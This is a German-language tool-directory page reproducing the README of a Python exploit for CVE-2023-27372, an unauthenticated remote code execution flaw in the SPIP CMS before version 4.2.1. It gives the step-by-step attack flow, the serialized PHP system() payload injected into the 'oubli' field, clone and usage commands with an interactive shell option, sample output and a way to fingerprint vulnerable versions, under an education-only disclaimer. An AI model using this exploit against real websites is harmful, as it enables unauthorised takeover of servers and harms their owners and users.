Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-27372 — Exploit für CVE-2023-27372 mit interaktiver Shell | Kitploit
Tools/GitHubGitHub/scriniariii/cve-2023-27372
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubscriniariii/cve-2023-27372

CVE-2023-27372

Exploit für CVE-2023-27372 mit interaktiver Shell

Repository anzeigen
2vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-27372 Exploit

Exploit für CVE-2023-27372, eine nicht authentifizierte Remote Code Execution Schwachstelle im SPIP CMS, die Versionen vor 4.2.1 betrifft.

⚠️ Nur für Bildungszwecke. Ausschließlich auf Systemen verwenden, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben. Die unbefugte Nutzung ist illegal.


Übersicht

SPIP ist ein Open-Source-CMS, das häufig für Web-Publishing verwendet wird. Diese Schwachstelle existiert im Passwort-Wiederherstellungsformular (/spip.php?page=spip_pass), wo der Parameter oubli ohne ordnungsgemäße Bereinigung verarbeitet wird, was einem Angreifer ermöglicht, beliebigen PHP-Code auf dem Server zu injizieren und auszuführen – ohne Authentifizierung.

FeldDetails
CVECVE-2023-27372
CVSS-Score9.8 (Kritisch)
AngriffsvektorNetzwerk
AuthentifizierungKeine erforderlich
Betroffene VersionenSPIP < 4.2.1
SchwachstellentypCode Injection / Nicht authentifiziertes RCE

Funktionsweise

  1. CSRF-Token abrufen — Eine GET-Anfrage wird an /spip.php?page=spip_pass gesendet, um das formulaire_action_args-Token aus dem HTML-Formular zu extrahieren.

  2. Payload erstellen — Ein PHP-serialisierter String wird mit dem auszuführenden Befehl erstellt:

    s:N:"<?php system('COMMAND'); ?>";
    

    Wobei N die genaue Bytelänge des inneren PHP-Strings ist.

  3. Payload senden — Eine POST-Anfrage wird mit dem erstellten Payload im oubli-Feld zusammen mit dem CSRF-Token gesendet. SPIP verarbeitet dieses Feld ohne Bereinigung und führt den injizierten PHP-Code aus.

  4. Ausgabe extrahieren — Die Befehlsausgabe wird in der HTML-Antwort zurückgegeben und aus dem value-Attribut des oubli-Eingabefelds geparst.

Anforderungen

  • Python 3.x
  • requests
  • beautifulsoup4
  • argparse
  • regex

Installation


git clone https://github.com/scriniarii/CVE-2023-27372

cd CVE-2023-27372

pip install requests beautifulsoup4

Verwendung

python3 exploit.py -u <URL> -c <command>
ArgumentBeschreibung
-u, --urlBasis-URL der Ziel-SPIP-Instanz
-c, --commandBetriebssystembefehl, der auf dem Ziel ausgeführt werden soll
-s, --shellInteraktive Shell

Beispiel


python3 exploit.py -u http://TARGET/ -c "id"

python3 exploit.py -u http://TARGET/ -s

Erwartete Ausgabe:

[+] Token found : JWDCxt5PTFzhPb...
 
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Betroffene Versionen

Um die SPIP-Version eines Ziels zu überprüfen, suchen Sie nach dem Meta-Generator-Tag im HTML-Code:

<meta name="generator" content="SPIP 4.2.0" />

[!CAUTION]
⚠️ Haftungsausschluss
Bitte verwenden Sie die Informationen und Exploits in meinen Repositorys nur zu Bildungszwecken und für verantwortungsvolle Offenlegung. Ich bin nicht verantwortlich für Missbrauch oder Schäden, die durch die Verwendung dieser Tools, Skripte oder Exploits entstehen.

Tool herunterladen